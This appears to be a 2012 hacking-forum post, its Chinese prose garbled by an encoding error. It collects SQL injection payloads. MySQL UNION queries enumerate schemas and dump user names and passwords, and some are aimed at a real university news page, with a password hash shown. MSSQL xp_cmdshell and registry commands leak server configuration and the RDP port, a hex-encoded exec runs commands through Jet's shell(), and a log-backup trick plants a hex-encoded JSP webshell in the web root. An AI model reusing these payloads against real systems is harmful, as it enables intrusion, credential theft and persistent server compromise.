admin 2012-9-15 14:26:54

MYSQL5ע̳˵

ȫС | 90 SecurityTeam -- 90ӢŶӡ


                                                             ӭַָӭѽѧϰ

                                                                  ̳ http://www.90team.net/



̳:Mysql 5+php ע

and (select count(*) from mysql.user)>0/*

һ.鿴MYSQLϢ(,汾,û)

and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*

.ݿ

and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8from information_schema.SCHEMATA limit 1,1/*
limit 0ʼѯ3ʱش˵2⡣

.

and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =16Ʊ limit 1,1/*

limit 0ʼѯ14ʱش˵˿13



and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8 from information_schema.COLUMNS where TABLE_NAME=16Ʊ limit 1,1/*

limit 0ʼѯʱش˵˱N-1С

.

and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*


ֱӱĵ룬ʱMD5֮ġ


                                                                                 ֲ׵ĿԵ̳ʣһľ

                                                                                              ӭָѼ

                                                                                                   By 90.S.T
                                                                                                   
                                                                                                      MSN/QQ:it7@9.cn
                                                                     
                                                                                                    ̳www.90team.net











http://news.cupl.edu.cn/V/videoshow.php?id=-95 UNION SELECT 1,2,loginame ,4,5,6,7,8,9 from --
password loginame




http://news.cupl.edu.cn/V/videoshow.php?id=-95 UNION SELECT 1,2,TABLE_NAME,4,5,6,7,8,9 rom information_schema.TABLES where TABLE_SCHEMA =CHAR(99, 45, 110, 101, 119, 115) limit 0,1--










administer
̨
fafda06a1e73d8db0809ca19f106c300










IIS404ҳĬ· C:\Windows\Help\iisHelp\common\404b.htm


ȡIISϢȡweb·

exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--

ִexec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--


CMD¶ȡն˶˿
regedit /e c:\\tsport.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"

Ȼ type c:\\tsport.reg | find "PortNumber"






;EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;--

;declare @s varchar(4000) set @s=cast(0x53656C656374202A2046726F6D204F70656E526F7753657428274D6963726F736F66742E4A65742E4F4C4544422E342E30272C20273B44617461626173653D6961735C6961732E6D6462272C202773656C656374207368656C6C2822636D642E657865202F63206563686F2057656C636F6D6520746F20392E302E732E74202020207777772E39307465616D2E6E65742020627920483478307872207869616F6A756E2020203E20433A5C57696E646F77735C48656C705C69697348656C705C636F6D6D6F6E5C343034622E68746D22292729 as varchar(4000));exec(@s);-- and 1=1


Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0', ';Database=ias\ias.mdb', 'select shell("cmd.exe /c echo Welcome to 9.0.s.t    www.90team.net> C:\Windows\Help\iisHelp\common\404b.htm")')



jspһ仰ľ




־챸
--1. гʼ
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--

--2.
;Insert Into ttt Values(0x3C25DA696628726571756573742E676574506172616D657465722822662229213D6E756C6C29286E6577206A6176612E696F2E46696C654F757470757453747265616D286170706C69636174696F6E2E6765745265616C5061746828225C5C22292B726571756573742E676574506172616D65746572282266222929292E777269746528726571756573742E676574506172616D6574657228227422292E67657442797465732829293BDA253EDA)--

--3. ݲļɾʱ
;Backup Log <ݿ> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
fafda06a1e73d8db0809ca19f106c300
fafda06a1e73d8db0809ca19f106c300

ҳ: [1]
鿴汾: MYSQL5ע̳˵